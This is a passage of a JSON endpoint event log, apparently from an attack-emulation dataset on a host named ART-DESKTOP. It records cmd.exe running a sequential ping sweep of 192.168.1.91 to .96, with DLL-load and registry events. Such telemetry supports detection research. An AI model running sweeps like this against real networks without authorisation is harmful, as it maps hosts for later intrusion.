"{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "process", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572421830000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.91", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883572426369984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883572426369984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572426990000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.92", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3068, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - 
"unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "process", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572431830000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.93", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5088, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}", - 
"unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": 
"{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "process", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572436840000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.94", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572436980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, 
- { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "process", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572441990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.95", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - 
"event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2204, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572442140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "event_type": "process", - "pid": 2204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572446990000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.96", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4776, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4776, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572447140000, - "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4776, - "process_name": "PING.EXE", - 
